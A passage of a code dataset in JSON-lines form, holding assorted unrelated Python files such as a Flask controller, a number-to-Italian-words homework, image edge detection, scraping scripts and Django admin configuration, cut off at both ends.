local_dir %s does not exist !!!\\n' % sys.argv[1])\n sys.stdout.write('Usage:\\n')\n sys.stdout.write('\\t %s local_dir remote_dir\\n\\n' % sys.argv[0])\n sys.exit(-1)\n\n if not sys.argv[2].startswith('/') or \\\n not os.popen3('pcs meta %s' % sys.argv[2])[1].read():\n sys.stdout.write('Error Usage: remote_dir %s does not exist !!!\\n' % sys.argv[2])\n sys.stdout.write('Usage:\\n')\n sys.stdout.write('\\t %s local_dir remote_dir\\n\\n' % sys.argv[0])\n sys.exit(-1)\n\n CreateObject = Pcsdr(sys.argv[1], sys.argv[2])\n CreateObject.run()\n\n\n","sub_path":"python/pcsdr.py","file_name":"pcsdr.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"529606376","text":"import logging\n\nch = logging.StreamHandler()\nformatter = logging.Formatter('%(name)s | %(message)s')\nch.setFormatter(formatter)\nlog = logging.getLogger(__name__)\nlog.addHandler(ch)\nlog.propagate = False\nlog.setLevel(logging.WARNING)\n\nlsunita=['','uno','due','tre','quattro','cinque','sei','sette','otto','nove']\nlsdecine=['','dieci','venti','trenta','quaranta','cinquanta','sessanta','settanta','ottanta','novanta']\nlsdieci=['dieci','undici','dodici','tredici','quattordici','quindici','sedici','diciassette','diciotto','diciannove']\n\ndef miliardi(n):\n m = n // 10**9\n s=''\n if m >= 10**2:\n s= centinaia(m)+decine(m)+unita(m)\n elif m >= 10:\n s= decine(m)+unita(m)\n elif m != 1:\n s= unita(m)\n else:\n return 'unmiliardo'\n return s+'miliardi'\n\ndef milioni(n):\n m = n // 10**6\n s=''\n if m >= 10**2:\n s= centinaia(m)+decine(m)+unita(m)\n elif m >= 10:\n s= decine(m)+unita(m)\n elif m != 1:\n s= unita(m)\n else:\n return 'unmilione'\n return s+'milioni'\n\ndef migliaia(n):\n m = n // 1000\n s=''\n if m >= 10**2:\n s= centinaia(m)+decine(m)+unita(m)\n elif m >= 10:\n s= decine(m)+unita(m)\n elif m != 1:\n s= unita(m)\n else:\n return 'mille'\n return s+'mila'\n\n\ndef centinaia(n):\n c = n % 1000 // 100\n d = n % 100 //10\n log.info('n: {0}, c: {1}, d: {2}'.format(n,c,d))\n s=''\n if c == 0:\n return s\n if c > 1:\n s=lsunita[c]+'cento'\n else:\n s='cento'\n if d == 8:\n return s[:-1]\n return s\n \ndef decine(n):\n if 10 <= (n % 100) <=19:\n return lsdieci[n%10]\n d = n % 100 // 10 # d sono le decine\n u = n % 10 # u sono le unita'\n log.info('n: {0}, d: {1}, u: {2}'.format(n,d,u))\n if u not in [1,8]:\n return lsdecine[d]\n else:\n return lsdecine[d][:-1]\n \ndef unita(n):\n if 10 <= (n % 100) <=19:\n return ''\n return lsunita[n % 10]\n \ndef conv(n):\n log.info('Conversione di n: {0}'.format(n))\n if n >= 10**9:\n return miliardi(n)+milioni(n)+migliaia(n)+centinaia(n)+decine(n)+unita(n)\n if n >= 10**6:\n return milioni(n)+migliaia(n)+centinaia(n)+decine(n)+unita(n)\n elif n >= 10**3:\n return migliaia(n)+centinaia(n)+decine(n)+unita(n)\n elif n >= 10**2:\n return centinaia(n)+decine(n)+unita(n)\n elif n >= 10:\n return decine(n)+unita(n)\n else:\n return unita(n)\n\n\nif __name__=='__main__':\n for i in [50011101,43332108,64355186,534471125,12331187,7528589,77298,51781,13000,71018]:\n print (conv(i))\n\n","sub_path":"students/AngeloSpognardi/homework01/program02.py","file_name":"program02.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"207910559","text":"from models.accord import AccordModel\nfrom util.logger import Logger\n\n\nclass AccordController():\n logger = Logger(__name__)\n @classmethod\n def make_accord(cls, data):\n if AccordModel.find_by_name(data['name']):\n return \"Accord with that name already exists. To edit, use PUT not POST\", 400, None\n\n try:\n new_accord = AccordModel(data['name'], data['category'], data['hexvalue'], data['scent_attribute'], data['alias'])\n new_accord.save_to_db()\n except:\n cls.logger.exception(\"Error in creating new accord\")\n return \"Internal Server Error.\", 500, None\n\n return \"\", 201, None\n\n @classmethod\n def edit_accord(cls, data):\n if not AccordModel.find_by_name(data['name']):\n return \"Accord with that name does not exists\", 400, None\n\n try:\n before_change = AccordModel.find_by_name(data['name'])\n before_change.category = data['category']\n before_change.hexvalue = data['hexvalue']\n before_change.scent_attribute = data['scent_attribute']\n before_change.save_to_db()\n except:\n cls.logger.exception(\"Error in editing exisitng accord\")\n return \"Internal System Error\", 500, None\n\n return \"\", 200, None\n\n @classmethod\n def delete_accord(cls, name):\n wanted = AccordModel.find_by_name(name)\n if not wanted:\n return \"Accord with that name doesn't exist\", 400, None\n\n try:\n wanted.delete_from_db()\n except:\n cls.logger.exception(\"Error deleting from db\")\n return \"Internal Server Error\", 500, None\n\n return \"\", 200, None\n\n @classmethod\n def get_all(cls):\n try:\n all_accords = AccordModel.get_all()\n except:\n cls.logger.exception(\"Error in getting all accords\")\n return \"Internal System Error\", 500, None\n return \"\", 200, all_accords\n\n @classmethod\n def get_accord(cls, name):\n try:\n target_accord = AccordModel.find_by_name(name)\n except:\n cls.logger.exception(\"Error in getting accord for given name\")\n return \"Internal System Error\", 500, None\n return \"\", 200, target_accord\n","sub_path":"controllers/accord.py","file_name":"accord.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"575605659","text":"#\n#Copyright (c) 2012-2021, NVIDIA CORPORATION.\n#SPDX-License-Identifier: Apache-2.0\n\n_version = (0, 3, 9)\nversion = '.'.join(map(str, _version))\n\n# Constant names (which happen to need to match methods called\n# handle_ in worker.py)\nCREATE_OBJECT = 'upload_object'\nREAD_OBJECT = 'get_object'\nUPDATE_OBJECT = 'update_object'\nDELETE_OBJECT = 'delete_object'\n","sub_path":"ssbench/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483273606","text":"import sys, getopt\nimport feature_extraction\nimport dir_config\nimport train_svm\nimport train_rforest\n\ndef main(argv):\n features = ''\n classifier = ''\n path = ''\n\n try:\n opts, args = getopt.getopt(argv,\"hf:c:p:\",[\"features=\",\"classifier=\", \"path=\"])\n except getopt.GetoptError:\n print ('test.py -f -c -p ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print ('run.py -f -c -p ')\n sys.exit()\n elif opt in (\"-f\", \"--features\"):\n features = arg\n elif opt in (\"-c\", \"--classifier\"):\n classifier = arg\n elif opt in (\"-p\", \"--path\"):\n path = arg\n \n if classifier== '' or features == '':\n print(\"Specify both features and classifier.\\n\\nrun.py -f -c -p \")\n sys.exit()\n\n #configure directories\n if path == '':\n print(\"Empty path.\")\n sys.exit()\n else:\n dir_config.config(path)\n \n feature_extraction.dataset_split(path)\n\n print ('Features to use: ', features)\n print ('Classifier to use: ', classifier)\n\n if features == 'opensmile_mfcc':\n feature_extraction.feature_extraction(path, f_type=\"opensmile_mfcc\")\n components = 39\n frames = 998\n elif features == 'opensmile_chroma':\n feature_extraction.feature_extraction(path, f_type=\"opensmile_chroma\")\n components = 12\n frames = 993\n elif features == 'mfcc':\n feature_extraction.feature_extraction(path, f_type=\"mfcc\")\n components = 39\n frames = 431\n elif features == 'cqt':\n feature_extraction.feature_extraction(path, f_type=\"cqt\")\n components = 12\n frames = 431\n elif features == 'cens':\n feature_extraction.feature_extraction(path, f_type=\"cens\")\n components = 12\n frames = 431\n \n if classifier == 'svm':\n train_svm.cross_val(path, features, components, frames)\n elif classifier == 'forest':\n train_rforest.cross_val(path, features, components, frames)\n \n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"80799500","text":"from scipy import stats\n\nfrom permute.core import one_sample, two_sample\n\n\ndef get_exception(test_name):\n return Exception(f\"Can't run a {test_name}. Incorrect data. \" +\n \"Only binary classification supported atm\")\n\n\ndef check_paired_sample_format(data):\n return len(data) == 2 and all(len(x) == 2 for x in data[0]) and \\\n all(len(x) == 2 for x in data[1])\n\n\ndef paired_ttest(confs):\n # run paired sample t-test only on binary prediction models\n if not check_paired_sample_format(confs):\n raise get_exception(\"paired sample t-test\")\n\n scores1 = [x[1] for x in confs[0]]\n scores2 = [x[1] for x in confs[1]]\n _, pval1 = stats.shapiro(scores1)\n _, pval2 = stats.shapiro(scores2)\n\n if pval1 < 0.05 or pval2 < 0.05:\n info =\\\n \"WARNING: Assumptions are likely violated. Data is unlikely to \" +\\\n \"be normally distributed.\"\n info += f\"\\nP-values from Shapiro-Wilk: {pval1:.4f}, {pval2:.4f}\"\n else:\n info =\\\n \"Assumptions are likely to hold. Data is likely to \" +\\\n \"be normally distributed.\"\n info += f\"\\nP-values from Shapiro-Wilk: {pval1:.4f}, {pval2:.4f}\"\n\n stat, pval = stats.ttest_rel(scores1, scores2)\n return stat, pval, info\n\n\ndef wilcoxon(confs):\n if not check_paired_sample_format(confs):\n raise get_exception(\"wilcoxon test\")\n\n scores1 = [x[1] for x in confs[0]]\n scores2 = [x[1] for x in confs[1]]\n diffs = [x1 - x2 for x1, x2 in zip(scores1, scores2)]\n stat, pval = stats.wilcoxon(diffs)\n info = \"\"\n return stat, pval, info\n\n\ndef permutation_one_sample(confs, stat='t'):\n if not check_paired_sample_format(confs):\n raise get_exception(\"paired permutation test\")\n\n scores1 = [x[1] for x in confs[0]]\n scores2 = [x[1] for x in confs[1]]\n\n # print(scores1[:20])\n # print(scores2[:20])\n\n pval, diff_means = one_sample(\n scores1, scores2, stat=\"mean\", alternative='two-sided')\n info = \"\"\n return diff_means, pval, info\n\n\ndef permutation_two_sample(confs, stat='t'):\n if not check_paired_sample_format(confs):\n raise get_exception(\"paired permutation test\")\n\n scores1 = [x[1] for x in confs[0]]\n scores2 = [x[1] for x in confs[1]]\n\n # print(scores1[:20])\n # print(scores2[:20])\n\n pval, diff_means = two_sample(\n scores1, scores2, stat=\"mean\", alternative='two-sided')\n info = \"\"\n return diff_means, pval, info\n","sub_path":"checklist_fork/checklist/tests/sig_functions.py","file_name":"sig_functions.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"250259362","text":"from shape_write import *\n\n\ndef container_write_round(cont, stream):\n cur = cont.nsp.next\n stream.write('Контейнер содержит {} элементов.\\n'.format(cont.nsp.value))\n if cur is not None:\n stream.write('Из них только круги:\\n')\n for i in range(cont.nsp.value):\n if cur.value.key == 1:\n stream.write('{}. {}.\\n'.format(i+1, shape_write(cur.value)))\n else:\n stream.write('{}. \\n'.format(i+1))\n cur = cur.next\n if cur.next.prev == cont.nsp.next:\n break","sub_path":"lab6_2/pp/container_write_round.py","file_name":"container_write_round.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"615325057","text":"from flask.ext.mysql import MySQL\nfrom config import mysql\nfrom itsdangerous import URLSafeTimedSerializer\nfrom flask import current_app as app\n\ndef getAnnouncements():\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getAnnouncements');\n\t\tdata=cursor.fetchall();\n\n\t\treturn data;\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getName(username):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getProfileUsername', (username,));\n\t\tdata=cursor.fetchall();\n\n\t\treturn data[0][1];\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getRAName(username):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getRAName', (username,));\n\t\tdata=cursor.fetchall();\n\n\t\treturn data[0][0];\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getDMName(username):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getDMName', (username,));\n\t\tdata=cursor.fetchall();\n\n\t\treturn data[0][0];\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getkrhid(username):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getProfileUsername', (username,));\n\t\tdata=cursor.fetchall();\n\n\t\treturn data[0][4];\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getYear():\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor=con.cursor();\n\t\tcursor.callproc('sp_getYear');\n\t\tdata=cursor.fetchall();\n\n\t\treturn data[0][1];\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getPermits(krhid, permitType):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor=con.cursor();\n\t\tcursor.callproc('sp_getPermits', (krhid, permitType,));\n\t\tdata=cursor.fetchall();\n\n\t\treturn data;\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close();\n\ndef getPIS(krhid, mode):\n\ttry:\n\t\tcon = mysql.connect();\n\t\tcursor = con.cursor();\n\t\tcursor.callproc('sp_getPIS', (krhid,));\n\t\tdata = cursor.fetchall();\n\n\t\tif mode is 1:\n\t\t\toutput = [data[0][4], data[0][5], data[0][6], data[0][7]];\n\t\telif mode is 2:\n\t\t\toutput = [data[0][8], data[0][9]];\n\t\telif mode is 3:\n\t\t\toutput = [data[0][10], data[0][11]];\n\t\telif mode is 4:\n\t\t\toutput = [data[0][12]];\n\t\telif mode is 5:\n\t\t\toutput = data[0];\n\n\t\treturn output;\n\n\texcept Exception as e:\n\t\tprint(str(e));\n\tfinally:\n\t\tcursor.close();\n\t\tcon.close;\n\ndef generateToken(email):\n\tserializer = URLSafeTimedSerializer(app.config['SECRET_KEY']);\n\treturn serializer.dumps(email, salt=app.config['SECURITY_PASSWORD_SALT']);\n\ndef confirmToken(token, expiration=3600):\n\tserializer = URLSafeTimedSerializer(app.config['SECRET_KEY']);\n\ttry:\n\t\temail = serializer.loads(\n\t\t\ttoken,\n\t\t\tsalt=app.config['SECURITY_PASSWORD_SALT'],\n\t\t\tmax_age=expiration\n\t\t)\n\texcept:\n\t\treturn False\n\treturn email\n","sub_path":"app/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"440457544","text":"# On a horizontal number line, we have gas stations at positions stations[0], stations[1], ..., \n# stations[N-1], where N = stations.length.\n\n# Now, we add K more gas stations so that D, the maximum distance between adjacent gas stations, is minimized.\n\n# Return the smallest possible value of D.\n\n# Example:\n\n# Input: stations = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], K = 9\n# Output: 0.500000\n# Note:\n\n# stations.length will be an integer in range [10, 2000].\n# stations[i] will be an integer in range [0, 10^8].\n# K will be an integer in range [1, 10^6].\n# Answers within 10^-6 of the true value will be accepted as correct.\n\n\n\n\n# Approach #3: Heap [Time Limit Exceeded]\n# Intuition\n\n# Following the intuition of Approach #2, if we are taking a repeated maximum, \n# we can replace this with a heap data structure, which performs repeated maximum more efficiently.\n\n# Algorithm\n\n# As in Approach #2, let's repeatedly add a gas station to the next larget interval K times. \n# We use a heap to know which interval is largest. In Python, we use a negative priority to simulate a max heap with a min heap.\n\nclass Solution(object):\n def minmaxGasDist(self, stations, K):\n pq = [] #(-part_length, original_length, num_parts)\n for i in xrange(len(stations) - 1):\n x, y = stations[i], stations[i+1]\n pq.append((x-y, y-x, 1))\n heapq.heapify(pq)\n\n for _ in xrange(K):\n negnext, orig, parts = heapq.heappop(pq)\n parts += 1\n heapq.heappush(pq, (-(orig / float(parts)), orig, parts))\n\n return -pq[0][0]\n \n# Complexity Analysis\n\n# Time Complexity: O(K \\log N)O(KlogN), where NN is the length of stations.\n\n# Space Complexity: O(N)O(N), the size of deltas and count.\n\n# Approach #4: Binary Search [Accepted]\n# Intuition\n\n# Let's ask possible(D): with K (or less) gas stations, can we make every adjacent distance between gas stations at most D? \n# This function is monotone, so we can apply a binary search to find D*.\n\n# Algorithm\n\n# More specifically, there exists some D* (the answer) for which possible(d) = False when d < D* \n# and possible(d) = True when d > D*. Binary searching a monotone function is a typical technique, \n# so let's focus on the function possible(D).\n\n# When we have some interval like X = stations[i+1] - stations[i], we'll need to use floor(X/D) \n# gas stations to ensure every subinterval has size less than D. This is independent of other intervals, \n# so in total we'll need to use \\sum_i \\lfloor \\frac{X_i}{D} \\rfloor gas stations. \n# If this is at most K, then it is possible to make every adjacent distance between gas stations at most D.\n\nclass Solution(object):\n def minmaxGasDist(self, stations, K):\n def possible(D):\n return sum(math.ceil((stations[i+1] - stations[i]) / D)-1\n for i in xrange(len(stations) - 1)) <= K\n\n lo, hi = 0, 10**8\n while hi-lo > 1e-6:\n mi = (lo + hi) / 2.0\n if possible(mi):\n hi = mi\n else:\n lo = mi\n return lo\n \n# Complexity Analysis\n\n# Time Complexity: O(NlogW), where NN is the length of stations, and W = 10^{14}\n# is the range of possible answers (10^8), divided by the acceptable level of precision (10^{-6}).\n\n# Space Complexity: O(1) in additional space complexity.\n","sub_path":"LEETCODE/0774. Minimize Max Distance to Gas Station.py","file_name":"0774. Minimize Max Distance to Gas Station.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641850105","text":"# -*- coding: utf8 -*-\r\nimport pdb\r\nimport re\r\nimport os\r\nimport pickle\r\nimport html\r\nimport csv\r\n \r\nL=os.listdir('pagescollectees')\r\nBase=[['firme','sector']]\r\nfor k in L:\r\n with open('pagescollectees/'+k,'r',encoding='utf8') as output:\r\n content = output.read()\r\n content = html.unescape(content)\r\n pattern1 = '

(.+?(?=\\t

))'\r\n firme = re.findall(pattern1,content)\r\n \r\n pattern2 = '
Secteur(.+?(?=
))'\r\n sector = re.findall(pattern2,content)\r\n \r\n if len(firme)==1 and len(sector)==1:\r\n print(\"100% - Extraction réaliser avec succès\", firme, sector)\r\n else:\r\n if len(firme) !=1:\r\n pattern1 ='class=\"float_lang_base_1 relativeAttr\"\\n\\tdir=\"ltr\" >(.+?(?=\\t))'\r\n firme = re.findall(pattern1,content)\r\n if len(sector) !=1:\r\n pattern2 ='
Sector(.+?(?=))'\r\n sector = re.findall(pattern2,content)\r\n print(\"Après correction, on a :\", firme, sector)\r\n \r\n firme = firme[0]\r\n sector = sector[0]\r\n\r\n Result = [firme,sector]\r\n Base.append(Result)\r\n\r\nwith open(\"cac40_sector.csv\", \"w\",encoding='utf8') as outfile:\r\n data=csv.writer(outfile,delimiter=',',lineterminator='\\n')\r\n for b in Base:\r\n data.writerow(b)\r\n","sub_path":"sbf_120/01 CAC 40/Analyse - sector.py","file_name":"Analyse - sector.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66169323","text":"from load_articles import read_articles, write_articles\nfrom form_dictionary import read_dictionary\n\n\ndef parse_keywords(article, dictionary):\n def get_keywords(text, dictionary):\n word_list = text.split(' ')\n word_ratio = {word: text.count(word) / len(word_list)\n for word in list(set(word_list))}\n keywords = []\n for word in word_ratio:\n if word in dictionary and word_ratio[word] < dictionary[word]:\n continue\n keywords.append(word)\n return keywords\n\n for article in article:\n article['keywords'] = get_keywords(\n article['title'] + ' ' + article['description'], dictionary)\n return article\n\n\nif __name__ == '__main__':\n dictionary = read_dictionary()\n articles = read_articles()\n articles = parse_keywords(articles, dictionary)\n write_articles(articles)\n","sub_path":"form_keywords.py","file_name":"form_keywords.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476109387","text":"'''\nThis file should be runnable to print map_statistics using \n$ python stats.py\n'''\nfrom __future__ import division, print_function\nfrom collections import namedtuple, Counter\nfrom ways import load_map_from_csv\n\n\n# Q7:\ndef map_statistics(roads):\n '''return a dictionary containing the desired information\n You can edit this function as you wish'''\n\n Stat = namedtuple('Stat', ['max', 'min', 'avg'])\n links = [len(j.links) for j in roads.junctions()]\n link_dist = [l.distance for l in roads.iterlinks()]\n c = Counter()\n for lnk in roads.iterlinks():\n c[lnk.highway_type] += 1\n return {\n 'Number of junctions' : len(roads.junctions()),\n 'Number of links' : sum([1 for i in roads.iterlinks()]),\n 'Outgoing branching factor' : Stat(max=max(links), min=min(links), avg=sum(links)/len(links)),\n 'Link distance' : Stat(max=max(link_dist), min=min(link_dist), avg=sum(link_dist)/len(link_dist)),\n # value should be a dictionary\n # mapping each road_info.TYPE to the no' of links of this type\n 'Link type histogram' : c, # tip: use collections.Counter\n }\n\n\ndef print_stats():\n for k, v in map_statistics(load_map_from_csv()).items():\n print('{}: {}'.format(k, v))\n\n \nif __name__ == '__main__':\n from sys import argv\n assert len(argv) == 1\n print_stats()\n","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"626312171","text":"from PIL import Image\nimport numpy as np\nimport time\n# ---------------------------------------------------------------------\n# Color edge detection for fun.\n# Use \".convert('L')\" on image for proper black white image detection.\n#\n# fastEdgeDetection has implemented an optimization i found smart.\n# black and white only\n# ---------------------------------------------------------------------\ndef main():\n img = (Image.open(\"corgi.jpg\"))#.convert(\"L\")\n img.show()\n\n start = time.time()\n processed_img = Image.fromarray(fastEdgeDetection(np.array(img)))\n print(f\"alg took: {time.time()-start}\")\n\n processed_img.show()\n\n save(processed_img)\n\n\n# ---------------------------------------------------------------------\n# My edge detection algorithm, default is with colors\n# Could generalize but don't see a reason to\n# ---------------------------------------------------------------------\ndef rgbEdgeDetection(img):\n ans = np.copy(img)\n brightness = 2 # typical values are 1 or 2\n fltr_ver = np.array([0.25, 0, -0.25, 0.5, 0, -0.5, 0.25, 0, -0.25]) * brightness # vertical edges\n fltr_hor = np.array([-0.25, -0.5, -0.25, 0, 0, 0, 0.25, 0.5, 0.25]) * brightness # horizontal edges\n col = img[0][0].size\n row = len(fltr_ver)\n\n for i in range(1, len(img) - 1):\n for j in range(1, len(img[0]) - 1):\n curr = img[i - 1:i + 2, j - 1:j + 2]\n curr_shaped = curr.reshape(row,col).T\n ans[i][j] = ((np.dot(curr_shaped, fltr_hor))**2\n + (np.dot(curr_shaped, fltr_ver))**2)**0.5\n\n return ans.astype(np.uint8)\n\n\n# ---------------------------------------------------------------------\n# Optimized black and white edge detection. ca 0.095s runtime, about 77 times faster.\n# Got the optimization from: https://craftofcoding.wordpress.com/2013/12/18/image-processing-in-python-code-efficiency/\n# ---------------------------------------------------------------------\ndef fastEdgeDetection(img):\n fltr_lod = np.array([0.25, 0, -0.25, 0.5, 0, -0.5, 0.25, 0, -0.25])\n fltr_hor = np.array([-0.25, -0.5, -0.25, 0, 0, 0, 0.25, 0.5, 0.25])\n\n r = 1\n i = 0\n rN = (r * 2 + 1) ** 2.0\n nr, nc = img.shape\n im1 = np.zeros((nr - 2 * r, nc - 2 * r), dtype=np.float)\n im2 = np.zeros((nr - 2 * r, nc - 2 * r), dtype=np.float)\n for k in range(-r, r + 1):\n for l in range(-r, r + 1):\n curr = (img[r + k:nr - r + k, r + l:nc - r + l])\n im1 += curr * fltr_lod[i]\n im2 += curr * fltr_hor[i]\n i+=1\n imS = (im1**2+im2**2)**0.5\n return imS.astype(np.uint8)\n\n\n# lazy save function. It works.\ndef save(img):\n like2save = input(\"would you like to save? input 1 \\n\")\n if like2save == \"1\":\n with open('img_count', 'r') as count:\n i = count.readline()\n print(f\"this is i: {i}\")\n if (len(i)> 0):\n i = int(i)\n img.save(f\"C:/Users/kobbe/OneDrive/Skrivbord/Image manipulation/img{i}.png\")\n i += 1\n else:\n i = 1\n img.save(f\"C:/Users/kobbe/OneDrive/Skrivbord/Image manipulation/img{i}.png\")\n i += 1\n with open('img_count', 'w') as count:\n count.write(str(i))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Edgedetection/RgbEdgeDetection.py","file_name":"RgbEdgeDetection.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"649967930","text":"# -*- encoding: utf-8 -*-\n\nfrom dal import autocomplete\nfrom django.contrib import admin\n\nfrom .core import CommitedModelAdmin\nfrom .filters import (\n JednostkaFilter,\n PBNIDObecnyFilter,\n PeselMD5ObecnyFilter,\n OrcidObecnyFilter,\n)\nfrom .helpers import *\nfrom ..models import (\n Jednostka,\n Autor,\n Autor_Jednostka,\n Autor_Dyscyplina,\n Dyscyplina_Naukowa,\n) # Publikacja_Habilitacyjna\n\n\n# Proste tabele\n\n# Autor_Dyscyplina\n\n\nclass Autor_DyscyplinaInlineForm(forms.ModelForm):\n dyscyplina_naukowa = forms.ModelChoiceField(\n queryset=Dyscyplina_Naukowa.objects.all(),\n widget=autocomplete.ModelSelect2(url=\"bpp:dyscyplina-autocomplete\"),\n )\n\n subdyscyplina_naukowa = forms.ModelChoiceField(\n queryset=Dyscyplina_Naukowa.objects.all(),\n widget=autocomplete.ModelSelect2(url=\"bpp:dyscyplina-autocomplete\"),\n required=False,\n )\n\n class Meta:\n fields = \"__all__\"\n\n def __init__(self, *args, **kw):\n super(Autor_DyscyplinaInlineForm, self).__init__(*args, **kw)\n if kw.get(\"instance\"):\n self.fields[\"rok\"].disabled = True\n\n\nclass Autor_DyscyplinaInline(admin.TabularInline):\n model = Autor_Dyscyplina\n form = Autor_DyscyplinaInlineForm\n extra = 1\n fields = (\n \"rok\",\n \"rodzaj_autora\",\n \"wymiar_etatu\",\n \"dyscyplina_naukowa\",\n \"procent_dyscypliny\",\n \"subdyscyplina_naukowa\",\n \"procent_subdyscypliny\",\n )\n\n\n# Autor_Jednostka\n\n\nclass Autor_JednostkaInlineForm(forms.ModelForm):\n autor = forms.ModelChoiceField(\n queryset=Autor.objects.all(),\n widget=autocomplete.ModelSelect2(url=\"bpp:autor-autocomplete\"),\n )\n\n jednostka = forms.ModelChoiceField(\n queryset=Jednostka.objects.all(),\n widget=autocomplete.ModelSelect2(url=\"bpp:jednostka-autocomplete\"),\n )\n\n class Meta:\n fields = \"__all__\"\n\n\nclass Autor_JednostkaInline(admin.TabularInline):\n model = Autor_Jednostka\n form = Autor_JednostkaInlineForm\n extra = 1\n\n\n# Autorzy\n\n\nclass AutorForm(forms.ModelForm):\n class Meta:\n fields = \"__all__\"\n model = Autor\n widgets = {\"imiona\": CHARMAP_SINGLE_LINE, \"nazwisko\": CHARMAP_SINGLE_LINE}\n\n\nclass AutorAdmin(ZapiszZAdnotacjaMixin, CommitedModelAdmin):\n form = AutorForm\n\n list_display = [\n \"nazwisko\",\n \"imiona\",\n \"tytul\",\n \"pseudonim\",\n \"poprzednie_nazwiska\",\n \"email\",\n \"pbn_id\",\n \"orcid\",\n ]\n list_select_related = [\n \"tytul\",\n ]\n fields = None\n inlines = [Autor_JednostkaInline, Autor_DyscyplinaInline]\n list_filter = [\n JednostkaFilter,\n \"aktualna_jednostka__wydzial\",\n \"tytul\",\n PBNIDObecnyFilter,\n OrcidObecnyFilter,\n PeselMD5ObecnyFilter,\n ]\n search_fields = [\n \"imiona\",\n \"nazwisko\",\n \"pseudonim\",\n \"poprzednie_nazwiska\",\n \"email\",\n \"www\",\n \"id\",\n \"pbn_id\",\n ]\n readonly_fields = (\"pesel_md5\", \"ostatnio_zmieniony\")\n\n fieldsets = (\n (\n None,\n {\n \"fields\": (\n \"imiona\",\n \"nazwisko\",\n \"tytul\",\n \"pseudonim\",\n \"pokazuj\",\n \"email\",\n \"www\",\n \"orcid\",\n \"pbn_id\",\n \"pesel_md5\",\n )\n },\n ),\n (\n \"Biografia\",\n {\n \"classes\": (\"grp-collapse grp-closed\",),\n \"fields\": (\"urodzony\", \"zmarl\", \"poprzednie_nazwiska\"),\n },\n ),\n ADNOTACJE_FIELDSET,\n )\n\n\nadmin.site.register(Autor, AutorAdmin)\n","sub_path":"src/bpp/admin/autor.py","file_name":"autor.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"85976115","text":"from flask import Flask, render_template, Blueprint, make_response, request\nimport requests, json\nfrom datetime import datetime\nfrom util.ResponseData import ResponseData\nimport random\nimport pickle\nimport json\nimport os\n\nsession = requests.Session()\nadapter = requests.adapters.HTTPAdapter(pool_connections=50, pool_maxsize=50)\nsession.mount('http://', adapter)\n\n# http://0.0.0.0:5000/requestRSS/espHandle\n\napi = Blueprint('api', __name__, url_prefix = \"/\")\n\nip_table = None\nuploadFlag = False\nwith open('espConfig.json', newline='') as espConfig:\n\tconfigData = json.load(espConfig)\n\tip_table = configData['espTable']\n\tuploadFlag = configData['uploadFlag']\n\nprint(\"\\nip_table: \", json.dumps(ip_table, indent=4, sort_keys=True))\nprint(\"uploadFlag: \", uploadFlag, 